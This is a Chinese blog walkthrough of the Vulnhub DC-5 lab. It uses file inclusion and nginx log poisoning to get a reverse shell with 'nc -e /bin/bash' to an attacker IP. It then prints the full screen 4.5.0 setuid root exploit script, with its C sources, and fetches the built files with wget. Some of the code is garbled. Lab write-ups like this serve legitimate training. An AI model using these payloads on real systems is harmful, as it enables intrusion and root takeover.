Vulnhub DC-5

Description

DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with intermediate or better experience. Time will tell (as will feedback).

As far as I am aware, there is only one exploitable entry point to get in (there is no SSH either). This particular entry point may be quite hard to identify, but it is there. You need to look for something a little out of the ordinary (something that changes with a refresh of a page). This will hopefully provide some kind of idea as to what the vulnerability might involve.

And just for the record, there is no phpmailer exploit involved. :-)

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

红字意思为在刷新页面后会有些改变的地方出现,且最终目的是获取 root 权限

Vulnhub DC-5_第1张图片

 Vulnhub DC-5_第2张图片

111 端口

Vulnhub DC-5_第3张图片 80端口

Vulnhub DC-5_第4张图片

 Vulnhub DC-5_第5张图片

在 welcome 页面上的信息看起来是英文但是缺少字母导致内容不好看清,且根据提示反复刷新并没有看到有变化的地方

Vulnhub DC-5_第6张图片

Vulnhub DC-5_第7张图片

Vulnhub DC-5_第8张图片

上方 url 的显示内容是我之前填入的,而关于 url 猜测文件包含,而我想要获取 root 权限

 ?file=php://filter/read=convert.base64-encode/resource=index.php

Vulnhub DC-5_第9张图片

Vulnhub DC-5_第10张图片

 ?file=/etc/passwd

Vulnhub DC-5_第11张图片

而 shadow 文件依旧不能回显,但是知道 url 是

linux系统日志文件的默认路径是:/var/log

而 Nginx 服务器访问 nginx 的日志有两个,access.log 和 error.log

?file=/var/log/nginx/access.log

Vulnhub DC-5_第12张图片

Vulnhub DC-5_第13张图片

Vulnhub DC-5_第14张图片

 Vulnhub DC-5_第15张图片

?file=/var/log/nginx/access.log&cmd=nc -e /bin/bash 192.168.37.128 5555 

Vulnhub DC-5_第16张图片

获取交互式 shell 

python -c "import pty; pty.spawn('/bin/bash')"

Vulnhub DC-5_第17张图片

Vulnhub DC-5_第18张图片

 根目录

Vulnhub DC-5_第19张图片

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} \;

Vulnhub DC-5_第20张图片

 Vulnhub DC-5_第21张图片

 Vulnhub DC-5_第22张图片

 Vulnhub DC-5_第23张图片

#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017) 
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."

①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①
cat << EOF > /tmp/libhax.c

#include
#include
#include
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

EOF


gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c

②②②②②②②②②②②②②②②②②②②②②②②②②②②②②②​​​​​​​②②​​​​​​​②②②②②②②②
cat << EOF > /tmp/rootshell.c

#include
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}

EOF


gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c

---------》》》
echo "[+] Now we create our /etc/ld.so.preload file..."

③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③
cd /etc
umask 000                                                                                                 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"             # newline needed

 

echo "[+] Triggering..."


screen -ls                                                                               # screen itself is setuid, so... 
/tmp/rootshell
           
        

按照文件所说的操作

Vulnhub DC-5_第24张图片

执行完后删除 

rm -f /tmp/libhax.c

编写第一个文件 libhax.c 和第二个文件 rootshell.c

填入脚本内容

Vulnhub DC-5_第25张图片

执行后得到 rootshell 后删除

rm -f /tmp/rootshell.c

开启服务器

Vulnhub DC-5_第26张图片

下载两个文件

wget http://192.168.37.128/libhax.so
wget http://192.168.37.128/rootshell

Vulnhub DC-5_第27张图片

依照操作执行命令

Vulnhub DC-5_第28张图片

cd /etc


umask 000


screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"


screen -ls


cd /tmp


./rootshel

顺利提权

Vulnhub DC-5_第29张图片

查看当前工作目录仍是 tmp,顺利进入 root 文件夹

Vulnhub DC-5_第30张图片

 最后一步,查看 flag

Vulnhub DC-5_第31张图片

 

你可能感兴趣的:(p2p,sql,c#,DC靶机)